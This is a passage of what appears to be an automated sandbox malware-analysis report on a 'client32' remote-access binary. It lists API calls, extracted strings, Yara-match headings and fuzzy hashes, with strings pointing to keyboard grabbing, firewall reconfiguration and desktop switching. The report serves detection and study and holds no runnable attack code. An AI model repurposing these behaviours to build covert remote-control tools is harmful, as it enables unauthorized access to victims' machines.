                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                                                                                    • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                                                                                    • API String ID: 83693535-2077998243
                                                                                                                                                                                                    • Opcode ID: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
                                                                                                                                                                                                    • Instruction ID: feb44ee288a455167e99161b47e0bacd9894a59b82cfe6c7d6bea4f2cf3f1955
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86B1B675E012299FDB22CFA4CD84BE9B7F5EB48708F5041E9E919A7380E7709A80CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ioctlsocket.WSOCK32 ref: 689B7642
                                                                                                                                                                                                    • connect.WSOCK32(00000000,?,?), ref: 689B7659
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,?), ref: 689B7660
                                                                                                                                                                                                    • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 689B76F3
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689B7717
                                                                                                                                                                                                    • ioctlsocket.WSOCK32 ref: 689B775C
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 689B7762
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 689B777A
                                                                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 689B778B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$ioctlsocket$CountTickconnectselect
                                                                                                                                                                                                    • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                                                                                                    • API String ID: 4076736948-2969206566
                                                                                                                                                                                                    • Opcode ID: 82e0a33be5e4bef42b17d716e678e04ace4da3e04084b9d1fe6aea649fda9186
                                                                                                                                                                                                    • Instruction ID: 87f9f4dd9c0a01c72500b6abf5fce001a59235a158a499ef375aa6c631893e23
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82e0a33be5e4bef42b17d716e678e04ace4da3e04084b9d1fe6aea649fda9186
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F241EA75900314AFE7209B64CC88BEFB3BAAF55308F804199E50997141EB74DB85CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1112FCF0
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1112FD21
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1112FD3C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$FolderPathwsprintf
                                                                                                                                                                                                    • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                                                                                                    • API String ID: 1170620360-4157686185
                                                                                                                                                                                                    • Opcode ID: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                                                                                                    • Instruction ID: f8032102c9863659257b5da4bc21e17edc1143fb98c82bb39be53882a9ddc186
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5731597AE0132A6BEA109FE59C80FFEF7789F5030DF200075ED55EA244EA31A5448B92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,?,?,0000000C,00000001,00000080,00000000,00000000,00000109,00000109), ref: 1117591E
                                                                                                                                                                                                    • CreateFileA.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 11175957
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1117597B
                                                                                                                                                                                                    • GetFileType.KERNEL32(110B7069), ref: 1117599A
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 111759BF
                                                                                                                                                                                                    • CloseHandle.KERNEL32(110B7069), ref: 111759D1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(110B7069), ref: 11175D87
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,?,?,0000000C,00000003,00000001,00000000), ref: 11175DA7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 11175DB1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateErrorLast$CloseHandle$Type
                                                                                                                                                                                                    • String ID: @$H
                                                                                                                                                                                                    • API String ID: 352418905-104103126
                                                                                                                                                                                                    • Opcode ID: 679a4524956597270a90762de09c9aff5b5ecab20de8695b0132f7cce8310b71
                                                                                                                                                                                                    • Instruction ID: ec9428be4747ff2da4708a1a5f0e83526a3e58a5cf2fe191f00f64c67b9fb349
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 679a4524956597270a90762de09c9aff5b5ecab20de8695b0132f7cce8310b71
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2223531D002CA9BEB528FA4CD81BADFFB5EF05318F240A29E551EB390D7759950CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B), ref: 1105F575
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterSection
                                                                                                                                                                                                    • String ID: (NULL)$..\ctl32\Config.cpp$Send EV_CONFIGSET from %s@%d$WARNING: *NOT* Sending EV_CONFIGSET from %s@%d$cfg %x: Set [%s]%s=%s$err == 0$idata->hCurrConfig
                                                                                                                                                                                                    • API String ID: 1904992153-2291704020
                                                                                                                                                                                                    • Opcode ID: d4a260db4a74a9a8f8fc78284288d63a35ac426a80f083e0e992cb1f419157db
                                                                                                                                                                                                    • Instruction ID: 7aff06277d8664bd47fe24daf387b215d76634cef051db57f0aa4e34213ea8d6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4a260db4a74a9a8f8fc78284288d63a35ac426a80f083e0e992cb1f419157db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7ED1C575D0026A9BDB96CF24CC80BE9B7F9BF48704F0441DCE959A7240E774AB84CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,689C67B5), ref: 689B8D6B
                                                                                                                                                                                                      • Part of subcall function 689B4F70: LoadLibraryA.KERNEL32(psapi.dll,?,689B8DC8), ref: 689B4F78
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 689B8DCB
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 689B8DD8
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 689B8EBF
                                                                                                                                                                                                      • Part of subcall function 689B4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 689B4FC4
                                                                                                                                                                                                      • Part of subcall function 689B4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,689B8E0D,00000000,?,689B8E0D,00000000,?,00000FA0,?), ref: 689B4FE4
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 689B8EAE
                                                                                                                                                                                                      • Part of subcall function 689B5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 689B5014
                                                                                                                                                                                                      • Part of subcall function 689B5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,689B8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 689B5034
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen
                                                                                                                                                                                                    • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                                                                                                    • API String ID: 3567076824-3484705551
                                                                                                                                                                                                    • Opcode ID: 4d09a5f605f08250b46ecb6a58cd99c719ba47dc7416cbc6a18f0fa482d8b66f
                                                                                                                                                                                                    • Instruction ID: 363b1bdb0c155dadfeafd2b1795e203785d0eee6e450614519ed3ab2efe4304c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d09a5f605f08250b46ecb6a58cd99c719ba47dc7416cbc6a18f0fa482d8b66f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C41F675A44219AFDB18DB91ED48FEF73BCEB59748F804064EA15B2240E770DA44CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FFE7C
                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000), ref: 110FFE83
                                                                                                                                                                                                    • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
                                                                                                                                                                                                    • SetThreadDesktop.USER32(00000000), ref: 110FFEA0
                                                                                                                                                                                                    • CloseDesktop.USER32(00000000), ref: 110FFEB9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 110FFEC1
                                                                                                                                                                                                    • CloseDesktop.USER32(00000000), ref: 110FFED7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 110FFEDF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7
                                                                                                                                                                                                    • SetThreadDesktop(%s) ok, xrefs: 110FFEAB
                                                                                                                                                                                                    • SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                                                                                                    • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                                                                                                    • API String ID: 2036220054-60805735
                                                                                                                                                                                                    • Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                                                                                    • Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1115ABB5
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1115ABC8
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message
                                                                                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                                                                                    • API String ID: 174411676-1728070458
                                                                                                                                                                                                    • Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                                                                                    • Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11134B22
                                                                                                                                                                                                      • Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                                                                                      • Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                                                                                      • Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                                                                                      • Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11134B31
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize
                                                                                                                                                                                                    • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                                                                                                    • API String ID: 1746592401-1270230032
                                                                                                                                                                                                    • Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                                                                                    • Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                                                                                      • Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                                                                                      • Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(023A8D48,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystemwsprintf
                                                                                                                                                                                                    • String ID: .%d$Error %s unloading audiocap dll$pcicl32
                                                                                                                                                                                                    • API String ID: 4033853999-3899566344
                                                                                                                                                                                                    • Opcode ID: 51ddca8647ab57187e0e1c166896a53c967c89ca25be28915a6d1b4060b12241
                                                                                                                                                                                                    • Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51ddca8647ab57187e0e1c166896a53c967c89ca25be28915a6d1b4060b12241
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,BBC4A55B,?,00000000,00000001), ref: 11158267
                                                                                                                                                                                                    • CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
                                                                                                                                                                                                    • wsprintfW.USER32 ref: 111582A7
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 111582B3
                                                                                                                                                                                                    • wsprintfW.USER32 ref: 11158367
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 11158408
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                                                                                    • API String ID: 3050498177-823534439
                                                                                                                                                                                                    • Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                                                                                    • Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11112B55
                                                                                                                                                                                                    • CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
                                                                                                                                                                                                    • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000000), ref: 11112C61
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                                                                                    • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                                                                                    • API String ID: 4195908086-2348320231
                                                                                                                                                                                                    • Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                                                                                    • Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76596610,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 11141906
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpenQueryValueVersion
                                                                                                                                                                                                    • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                                                                                    • API String ID: 2996790148-2117887902
                                                                                                                                                                                                    • Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                                                                                    • Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1110D0F6
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003BC), ref: 1110D109
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003BC), ref: 1110D118
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Initialize$CreateCurrentEnterEventLeaveThreadwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                                                                                    • API String ID: 3342958434-1024648535
                                                                                                                                                                                                    • Opcode ID: 9bf6e749eb4aa396e4371d48aecc328a042bee4d9b99b0343c33cbf1c1c517ad
                                                                                                                                                                                                    • Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bf6e749eb4aa396e4371d48aecc328a042bee4d9b99b0343c33cbf1c1c517ad
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
